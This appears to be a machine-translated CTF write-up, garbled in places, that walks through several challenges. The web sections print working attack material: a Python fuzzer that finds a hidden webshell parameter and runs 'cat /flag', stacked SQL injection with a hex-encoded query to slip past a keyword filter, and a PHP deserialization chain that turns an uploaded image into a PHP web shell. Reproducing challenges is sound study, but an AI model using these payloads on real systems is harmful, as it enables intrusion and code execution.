0x01 Foreword
Two days before the chicken dish + x and a few big brother was a formal participated in a ctf online game is the first time to participate in this contest (some time ago a giant man also gave us a Spanish game, but not a formal competition , do question when the game is over), I did not expect false starts, a dish of B, except for a sign to prove that you sign up to the problem, a question did not get out, today I am also a humble brother ah! End of the game bigwigs began to put writeup, ready to take a look at some topic or another, to reproduce it.
First began to do this is to track MISC subject "Kun or eel orGame"
After entering the site, or find Kun eel orGame There are three options
Kun and there are some open eels mp3 you chicken is so beautiful and bowl wide face
In addition to listening to the audio of a song which preceded a few seconds of keyboard percussion are no different, open a spectrum view with Audacity also found no problems, WinHex binary analyze what special place did not find, try using MP3Stego extract files, nor find the password, what advice did not see, is very uncomfortable, they turned to analyze the game as shown in the game, read on to know how to play
Over a few, found difficulty is so big, uncomfortable .jpg, view the page source code, is a pile of js file
After not tell the difference, I still think there will be problems mp3, it has been analyzed for a long time, to no avail
Wp released after the game, understand how to get looked after, there is a game gb file when the page loads
Save all the files in a directory to local, use VisualBoyAdvance emulator can open this file gb, to browse local effect, and then the simulator also cheat
Open the game
After the first open a search, then finished a few, and by this time the highest points, found mainly two positions
The highest scores will change to 255, using the hexadecimal
To open a game, no matter how many points to play will pop up flag
Reverse 0x03 AD title Strong Net Pioneer
This question also read a long time, did not analyze it, just read the wp understand, download attachments, and no suffix
IDA directly onto the F5, see the main function, from v44 to v40 into the original digital character
The last two have found equal sign, decisive Base64, but when the first v44 int type, can not be calculated, just behind the record
ZmxhZ3ttYWZha3VhaWxhaXFpYW5kYW9ifQ==
base64 Decode
0x04 MISC playing field
After the download unzip attachments, is a name to "take a look at what" rar archive, unpacked, a picture of Kun
Use zsteg get flag
0x05 clever hackers
After opening the page shown in Figure
Access wensite/www.tar.gz
to obtain the source archive, unpacked 3002 strange file name, and each file is opened is very strange code
See page content is clever hackers, and php file which also found a large number of variables GET and POST submission may be shell password, but in the end I do not know which is which parameters php file, write the script fuzz
import os
import requests
from multiprocessing import Pool
path = "/src/"#下载下来源码文件路径
files = os.listdir(path)
url = "http://localhost/src/"#网站地址
def extract(f):
gets = []
with open(path+f, 'r') as f:
lines = f.readlines()
lines = [i.strip() for i in lines]
for line in lines:
if line.find("$_GET['") > 0:
start_pos = line.find("$_GET['") + len("$_GET['")
end_pos = line.find("'", start_pos)
gets.append(line[start_pos:end_pos])
return gets
def exp(start, end):
for i in range(start, end):
filename = files[i]
gets = extract(filename)
print "try: %s" % filename
for get in gets:
new_url = "%s%s?%s=%s" % (url, filename, get, 'echo "got it"')
r = requests.get(new_url)
if 'got it' in r.content:
print new_url
break
def main():
pool = Pool(processes=15)
for i in range(0, len(files), len(files)/15):
pool.apply_async(exp, (i, +len(files)/15,))
pool.close()
pool.join()
if __name__ == "__main__":
main()
Came out is xk0SzyKwfzw.php
this document, GET parameters submittedEfa5BVG
Cat get directly to the flagwebsite/xk0SzyKwfzw.php?Efa5BVG=cat%20/flag
0x06 casual note
This question is mainly on the stack injection
In SQL, a semicolon (;) is used to indicate the end of a sql statement. Imagine we are in; to continue construction next statement after the end of a sql statement, will perform together? Therefore, this idea also created a stack injection. The union injection (co-injection) will also merge two statements together, what is the difference between what? The difference is that all type union or a union statement executed is limited, may be used to execute a query, the injection can be performed while the stack is arbitrary sentence. For example the following example. The user input: 1; DELETE FROM products generated by the server :( sql statement is not performed by filtering the input parameter) Select * from products where productid = 1; DELETE FROM products when executing the query, the first query information display, The second will delete the entire table.
Random test, submit 1‘ union select 1,2,3
returns
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
These filters, substantially the keywords are filtered using a stack injection
Submitted 1';show tables; #
display
array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
Submit 1';show columns from '1919810931114514';#
returns field names in 1,919,810,931,114,514
Directly by bypassing the stored procedure and returns the result ,, binary +16
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
0x07 Upload
20,191,101 Add
When the page opens, you can visit, and registration, after registering an account, find an upload interface
But only upload pictures, upload and does not give the location, should the need is to upload the Trojans, but only after trying to upload pictures horse can not be directly used, to dirsearch scanning path, find the source code leak, direct access www.tar.gz you can get the source code, the following code audit
Is tp5 framing system, first check the routing information, focused index and upload_img
Look at the index.php, in login_check method, the system obtains from the cookie to the string, and deserialize
In the Profile, the upload_img have to upload the file copy operation methods, and this operation of $ this-> ext, $ this-> filename_tmp, $ this-> filename can be controlled by anti-serialization. If we can call upload_img this method, knowledge of the circumstances path to the image, you can rename any image files, you can achieve the picture of the horse.
In the back, there are two methods magic
Register.php continue to look, at tp5 / application / web / controller / Register.php present document __destruct method $ this-> registed, $ this-> checker during deserialization is controllable. If we take $ this-> checker assigned Register class, Register class does not index method, so when the call is triggered __call method, thus forming a complete attack chains.
The last attack chain:
Register->__destruct
Profile-> __call
Profile-> __get
Profile-> upload_img()
Let's go right away to upload a picture, you can find the file path F12 Once uploaded, and access
Configuration following code, and run locally, to obtain a cookie, the cookie using the alternative station to give the title cookie
<?php
namespace app\web\controller;
class Profile
{
public $checker=0;
public $filename_tmp="../public/upload/f4e7685fe689f675c85caeefaedcf40c/3b5cc1c061dce193bb89ea4ee47ace85.png";
public $filename="../public/upload/f4e7685fe689f675c85caeefaedcf40c/xianyu.php";
public $upload_menu;
public $ext=1;
public $img;
public $except=array('index'=>'upload_img');
}
class Register
{
public $checker;
public $registed=0;
}
$a=new Register();
$a->checker=new Profile();
$a->checker->checker = 0;
// echo serialize($a);
echo base64_encode(serialize($a));
?>
After connecting, the flag can be read in the root directory
Currently he read several 0x08 wp, looked after the other, we will try to reproduce it